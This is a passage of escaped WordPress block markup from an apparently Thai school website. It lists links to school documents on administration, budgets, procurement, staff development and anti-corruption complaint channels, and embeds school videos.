data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:embed {\"url\":\"https://www.youtube.com/embed/i-C4sNY7Mf8?si=SlY3es07RyplR9Sc\",\"type\":\"rich\",\"providerNameSlug\":\"embed-handler\",\"responsive\":true} -->\n<figure class=\"wp-block-embed is-type-rich is-provider-embed-handler wp-block-embed-embed-handler\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.youtube.com/embed/i-C4sNY7Mf8?si=SlY3es07RyplR9Sc\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":418,\"width\":\"566px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:566px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 